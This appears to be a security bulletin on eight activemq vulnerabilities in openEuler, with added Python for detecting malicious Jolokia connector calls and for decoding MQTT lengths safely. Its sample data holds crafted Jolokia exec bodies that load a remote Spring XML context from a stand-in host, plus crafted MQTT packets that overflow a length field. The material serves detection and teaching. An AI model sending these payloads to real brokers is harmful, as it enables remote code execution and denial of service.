SB2026050349 - openEuler 24.03 LTS SP1 update for activemq

Published: May 3, 2026

Security Bulletin ID SB2026050349
CSH Severity
Medium
Patch available
YES
Number of vulnerabilities 8
Exploitation vector Remote access
Highest impact Code execution

Breakdown by Severity

Medium 75% (6 of 8), Low 25% (2 of 8)

Description

This security bulletin contains information about 8 security vulnerabilities in the activemq package shipped with openEuler 24.03 LTS SP1.


1) Path traversal (CVE-ID: CVE-2026-33227)

The vulnerability allows a remote authenticated user to load unintended classpath resources.

The vulnerability exists due to path traversal in Stomp consumer creation and in Web console message browsing when an authenticated user-supplied key value is used to locate a resource. A remote user can supply a crafted key value to load classpath resources that were never meant to be reachable.

The issue occurs in two places: when creating a Stomp consumer and when browsing messages in the Web console. On its own it only discloses or loads resources, but it could be chained with another weakness for further exploitation.


2) Code Injection (CVE-ID: CVE-2026-34197)

The vulnerability allows a remote user to execute arbitrary code.

The vulnerability exists due to code injection in the Jolokia JMX-HTTP bridge and the ActiveMQ MBeans it exposes when handling an authenticated exec operation whose argument is a crafted discovery URI. A remote user can invoke BrokerService.addNetworkConnector(String) or BrokerService.addConnector(String) with such a URI to execute arbitrary code.

The issue is reachable through the web console endpoint /api/jolokia/. Exploitation causes a remote Spring XML application context to be loaded via the VM transport's brokerConfig parameter before configuration validation completes, so the malicious context is applied regardless of the later validation result.


3) Improper Check or Handling of Exceptional Conditions (CVE-ID: CVE-2026-39304)

The vulnerability allows a remote attacker to cause a denial of service.

The vulnerability exists due to improper handling of TLSv1.3 KeyUpdate messages in the ActiveMQ NIO SSL transports when processing client-triggered KeyUpdates. A remote attacker who can open a TLS connection can trigger KeyUpdate messages in rapid succession to cause a denial of service.

Only TLSv1.3 connections lead to out-of-memory exhaustion; on earlier TLS versions the same traffic may instead hang the affected connection.


4) Integer overflow (CVE-ID: CVE-2026-40046)

The vulnerability allows a remote attacker to cause a denial of service.

The vulnerability exists due to integer overflow or wraparound in the handling of the Remaining Length field of MQTT control packets while they are being parsed. A remote attacker can send a specially crafted MQTT control packet to cause a denial of service.


5) Code Injection (CVE-ID: CVE-2026-40466)

The vulnerability allows a remote user to execute arbitrary code.

The vulnerability exists due to improper input validation and code injection in BrokerView.addNetworkConnector and BrokerView.addConnector, reachable through Jolokia, when a connector is added using an HTTP discovery transport. A remote user can add a connector whose discovery endpoint is a malicious HTTP server; that server returns a VM transport URI, which in turn loads a remote Spring XML application context and executes arbitrary code.

Exploitation requires the activemq-http module to be on the broker's classpath.
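Both items 2 and 5 above share the same trigger: an authenticated Jolokia exec call against addConnector or addNetworkConnector whose URI argument points at a VM transport with a brokerConfig parameter or at an HTTP discovery transport. The following Python is an added example of detection logic a defender might run over captured request bodies to the /api/jolokia/ endpoint; it is not ActiveMQ or Jolokia code. The sample bodies are constructed for the example, and the MBean name used in them (org.apache.activemq:type=Broker,brokerName=localhost) is assumed to follow ActiveMQ's usual naming.

```python
import json
from urllib.parse import parse_qs, urlsplit

# The two BrokerView/BrokerService operations this bulletin names as the
# code-execution sinks reachable through Jolokia exec (items 2 and 5).
CONNECTOR_OPS = ("addConnector", "addNetworkConnector")

# Constructed sample of JSON bodies as POSTed to /api/jolokia/ (not real
# traffic; the MBean name follows ActiveMQ's usual naming, an assumption here).
SAMPLE_BODIES = [
    # Benign attribute read.
    '{"type":"read","mbean":"org.apache.activemq:type=Broker,brokerName=localhost",'
    '"attribute":"TotalConsumerCount"}',
    # Item 2: VM transport whose brokerConfig pulls a remote Spring XML context.
    '{"type":"exec","mbean":"org.apache.activemq:type=Broker,brokerName=localhost",'
    '"operation":"addNetworkConnector(java.lang.String)",'
    '"arguments":["vm://rogue?brokerConfig=xbean:http://203.0.113.10/ctx.xml"]}',
    # Item 5: HTTP discovery transport pointing at an attacker-controlled server.
    '{"type":"exec","mbean":"org.apache.activemq:type=Broker,brokerName=localhost",'
    '"operation":"addConnector(java.lang.String)",'
    '"arguments":["http://203.0.113.10:8080/discovery"]}',
    # Bulk request: Jolokia accepts a JSON list; the exec hides behind a "list".
    '[{"type":"list"},{"type":"exec",'
    '"mbean":"org.apache.activemq:type=Broker,brokerName=localhost",'
    '"operation":"addNetworkConnector","arguments":["static:(tcp://10.0.0.5:61616)"]}]',
    # Garbage that must not crash the scanner.
    'not json at all',
]


def iter_requests(body):
    """Yield each Jolokia request object in a body (single object or bulk list)."""
    try:
        parsed = json.loads(body)
    except json.JSONDecodeError:
        return
    for item in parsed if isinstance(parsed, list) else [parsed]:
        if isinstance(item, dict):
            yield item


def op_name(operation):
    """Strip the signature: 'addConnector(java.lang.String)' -> 'addConnector'."""
    return operation.split("(", 1)[0].strip()


def classify_uri(uri):
    """Map a connector URI to the risky pattern it matches, or None."""
    scheme = uri.split(":", 1)[0].lower()
    if scheme == "vm":
        if "brokerConfig" in parse_qs(urlsplit(uri).query):
            return "vm transport with brokerConfig (remote Spring XML context load)"
        return "vm transport requested by a remote caller"
    if scheme in ("http", "https"):
        return "HTTP discovery transport (needs activemq-http on the classpath)"
    return None


def detect(body):
    """Return (severity, operation, reason, uri) findings for one request body."""
    findings = []
    for req in iter_requests(body):
        if req.get("type") != "exec":
            continue
        name = op_name(str(req.get("operation", "")))
        if name not in CONNECTOR_OPS:
            continue
        args = req.get("arguments") or []
        uri = str(args[0]) if args else ""
        reason = classify_uri(uri)
        if reason is not None:
            findings.append(("high", name, reason, uri))
        else:
            # Any connector added over the HTTP bridge is still worth a ticket.
            findings.append(("medium", name, "connector added via Jolokia exec", uri))
    return findings


def scan(bodies):
    """Scan many bodies; returns (index, finding) pairs for triage."""
    return [(i, f) for i, body in enumerate(bodies) for f in detect(body)]


if __name__ == "__main__":
    for idx, finding in scan(SAMPLE_BODIES):
        print(idx, *finding)
```

The scanner deliberately treats a bulk list the same as a single request, since Jolokia executes every element of a list. It only covers JSON POST bodies; Jolokia also accepts GET-style requests with the operation encoded in the URL path, so a complete detection would need a second parser for that form. Detection is a stopgap: the fix is the vendor update, and until it is installed, restricting who can reach the web console and which MBean operations Jolokia is allowed to exec (Jolokia supports a deny-list policy for this) removes the attack surface rather than just observing it.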


6) Cross-site scripting (CVE-ID: CVE-2026-41043)

The vulnerability allows a remote user to inject malicious content into the web console.

The vulnerability exists due to cross-site scripting in the ActiveMQ Web Console while browsing queues. A remote user can inject HTML into a JMS selector field and override the response content type to HTML, so that the injected markup is rendered by the browser of anyone viewing the queue page.


7) Code Injection (CVE-ID: CVE-2026-41044)

The vulnerability allows a remote user to execute arbitrary code.

The vulnerability exists due to improper input validation and code injection in the admin web console and the DestinationView MBean when a malicious broker name is processed and triggers VM transport creation. A remote user can construct a malicious broker name and send a message through the DestinationView MBean to execute arbitrary code.

Exploitation requires access to the admin web console and to the DestinationView MBean exposed by Jolokia.


8) Integer overflow (CVE-ID: CVE-2025-66168)

The vulnerability allows a remote user to cause a denial of service.

The vulnerability exists due to integer overflow within the MQTT module when decoding malformed packets. A remote user can send specially crafted packets to the broker, trigger the integer overflow and cause a denial of service. Brokers that do not have an MQTT transport connector enabled are not affected.
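Items 4 and 8 both concern integer overflow while decoding the MQTT Remaining Length field, which the protocol encodes as a variable-length integer of at most four bytes (7 data bits each, continuation bit 0x80, maximum 268,435,455). The Python below is an added example, not ActiveMQ's code, that puts an illustrative unsafe decoder (unbounded loop, 32-bit wraparound emulated to mirror Java int arithmetic) beside a spec-conformant one and shows how a crafted five-byte field makes the unsafe version report a negative or zero length. The packets are constructed for the example.

```python
MAX_REMAINING_LENGTH = 268_435_455  # 2**28 - 1: four 7-bit groups, the MQTT ceiling
MAX_VBI_BYTES = 4                   # MQTT 3.1.1 / 5.0 allow at most four bytes


class MalformedPacket(ValueError):
    """Raised when the fixed header cannot be decoded under the spec's limits."""


def wrap_i32(v):
    """Emulate two's-complement 32-bit int wraparound (Java-style arithmetic)."""
    v &= 0xFFFFFFFF
    return v - 0x1_0000_0000 if v & 0x8000_0000 else v


def decode_remaining_length_naive(buf, offset=1):
    """Illustrative UNSAFE decoder: unbounded loop plus 32-bit arithmetic.

    Constructed to show the failure class; this is not ActiveMQ's code.
    """
    multiplier, value = 1, 0
    while True:
        if offset >= len(buf):
            raise MalformedPacket("truncated remaining-length field")
        b = buf[offset]
        offset += 1
        value = wrap_i32(value + (b & 0x7F) * multiplier)
        multiplier = wrap_i32(multiplier * 128)
        if not b & 0x80:
            return value, offset


def decode_remaining_length(buf, offset=1):
    """Spec-conformant decoder: at most four bytes, so the value can never
    exceed 268,435,455 and no arithmetic can wrap."""
    multiplier, value = 1, 0
    for _ in range(MAX_VBI_BYTES):
        if offset >= len(buf):
            raise MalformedPacket("truncated remaining-length field")
        b = buf[offset]
        offset += 1
        value += (b & 0x7F) * multiplier
        if not b & 0x80:
            return value, offset
        multiplier *= 128
    raise MalformedPacket("remaining length uses more than 4 bytes")


def parse_fixed_header(buf, max_remaining=MAX_REMAINING_LENGTH):
    """Return (packet_type, flags, remaining_length, header_len) or raise.

    max_remaining models a broker-side frame cap: a length that the decoder
    accepts should still be checked against what the broker will buffer.
    """
    if not buf:
        raise MalformedPacket("empty packet")
    remaining, header_len = decode_remaining_length(buf, 1)
    if remaining > max_remaining:
        raise MalformedPacket(f"remaining length {remaining} exceeds cap {max_remaining}")
    return buf[0] >> 4, buf[0] & 0x0F, remaining, header_len


def safe_to_allocate(buf, max_remaining=MAX_REMAINING_LENGTH):
    """True only if the header decodes cleanly and the length is within the cap."""
    try:
        parse_fixed_header(buf, max_remaining)
        return True
    except MalformedPacket:
        return False


# Constructed packets. 0x30 = PUBLISH, QoS 0. The first two carry a fifth
# length byte, which the spec forbids; an unbounded 32-bit decoder wraps
# instead of rejecting them.
CRAFTED_WRAP_NEGATIVE = bytes([0x30, 0xFF, 0xFF, 0xFF, 0xFF, 0x7F])  # naive -> -1
CRAFTED_WRAP_ZERO = bytes([0x30, 0x80, 0x80, 0x80, 0x80, 0x10])      # naive -> 0
VALID_128 = bytes([0x30, 0x80, 0x01])                                # 128 bytes follow

if __name__ == "__main__":
    for name, pkt in (("negative", CRAFTED_WRAP_NEGATIVE), ("zero", CRAFTED_WRAP_ZERO)):
        print(name, "naive:", decode_remaining_length_naive(pkt)[0],
              "safe:", safe_to_allocate(pkt))
```

The two crafted packets show the two ways a wrapped length hurts a broker: a negative value feeds a sign-confused size into buffer or loop bookkeeping, and a zero value makes the parser believe a frame it has not fully received is complete, so it resynchronises on attacker-chosen bytes. Bounding the loop to four bytes is what the specification already demands; the explicit max_remaining cap is the extra step a broker should take, because even a well-formed 268 MB length is a memory-exhaustion request if the broker allocates up front.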


Remediation

Install the update from the vendor's website.